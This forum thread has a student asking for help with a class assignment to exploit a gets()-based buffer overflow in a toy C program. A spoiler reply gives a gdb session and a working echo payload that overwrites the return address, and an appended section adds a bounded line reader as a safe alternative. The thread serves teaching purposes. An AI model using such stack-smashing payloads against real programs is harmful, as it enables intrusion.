Help Buffer Overflow Attack

Hey, for an assignment in my class I am supposed to write a C program that implements a buffer overflow attack on the program below, isThisGood.c, by exploiting the input, see gets(). You do NOT modify the program below, instead craft a malicious input that causes a successful exploit. (It is OK to add comments @ the top of the program.) Successful exploit invokes the function, oopsIGotToTheBadFunction, though this function is NOT explicitly called in the code!

Could anyone please help me with this?

#include <stdio.h>
#include <stdlib.h>

int oopsIGotToTheBadFunction(void)
{
    printf("Gotcha!\n");
    exit(0);
}

int goodFunctionUserInput(void)
{
    char buf[12];
    gets(buf);
    return(1);
}

int main(void)
{
    goodFunctionUserInput();
    printf("Overflow failed\n");
    return(1);
}


Overflow failed
http://www.cplusplus.com/forum/beginner/148111/

--- spoilers ahead ---
$ clang++ -ggdb foo.cpp
$ gdb a.out
(gdb) break goodFunctionUserInput
Breakpoint 1 at 0x4005cc: file foo.cpp, line 11.
(gdb) run
Starting program: ./a.out 

Breakpoint 1, goodFunctionUserInput () at foo.cpp:11
(gdb) backtrace
#0  goodFunctionUserInput () at foo.cpp:11
#1  0x0000000000400604 in main () at foo.cpp:16
(gdb) print /x *buf@40
$1 = {0xa0, 0x4, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xd0, 0xe0, 0xff, 0xff, 0xff, 0x7f, 0x0, 
  0x0, 0x4, 0x6, 0x40, 0x0, 0x0, 0x0, 0x0, 0x0, 0xb0, 0xe1, 0xff, 0xff, 0xff, 0x7f, 0x0, 0x0, 0x0, 0x0, 0x0, 
  0x0}
(gdb) print oopsIGotToTheBadFunction
{int (void)} 0x400590 <oopsIGotToTheBadFunction()>
(gdb) quit
$ echo -e "farmacodependientes\x0\x90\x05\x40" | ./a.out
Gotcha!
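The overflow shown in this thread works only because gets() keeps writing past the 12-byte buf. As an added example (not part of the original posts), here is a bounded line reader that truncates an over-long line and drains the remainder instead of overwriting the stack. The names read_line_bounded, feed and BUF_SIZE are hypothetical, and the sample line is constructed from the input shown in the reply.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 12  /* same size as buf in goodFunctionUserInput() */

/* Read one line into buf, never writing more than cap bytes.
 * Returns how many input bytes did not fit and were discarded,
 * or -1 if cap is 0 or the stream is already at EOF. */
long read_line_bounded(FILE *in, char *buf, size_t cap)
{
    size_t n = 0;
    long dropped = 0;
    int c;

    if (cap == 0)
        return -1;
    while ((c = fgetc(in)) != EOF && c != '\n') {
        if (n + 1 < cap)
            buf[n++] = (char)c;  /* always leave room for '\0' */
        else
            dropped++;           /* drain the rest of the line */
    }
    buf[n] = '\0';
    return (c == EOF && n == 0 && dropped == 0) ? -1 : dropped;
}

/* Hypothetical helper: pass len raw bytes through a temp file. */
long feed(const char *data, size_t len, char *buf, size_t cap)
{
    FILE *f = tmpfile();
    long r;
    if (f == NULL)
        return -2;
    fwrite(data, 1, len, f);
    rewind(f);
    r = read_line_bounded(f, buf, cap);
    fclose(f);
    return r;
}

int main(void)
{
    /* Constructed sample: the 23-byte line from the post plus '\n'. */
    static const char line[] = "farmacodependientes\x00\x90\x05\x40\n";
    char buf[BUF_SIZE];
    long dropped = feed(line, sizeof line - 1, buf, sizeof buf);
    printf("kept %zu bytes, dropped %ld\n", strlen(buf), dropped);
    return 0;
}
```

Draining the rest of the line matters as much as the bound: otherwise the discarded tail would be consumed by the next read as if it were a fresh line.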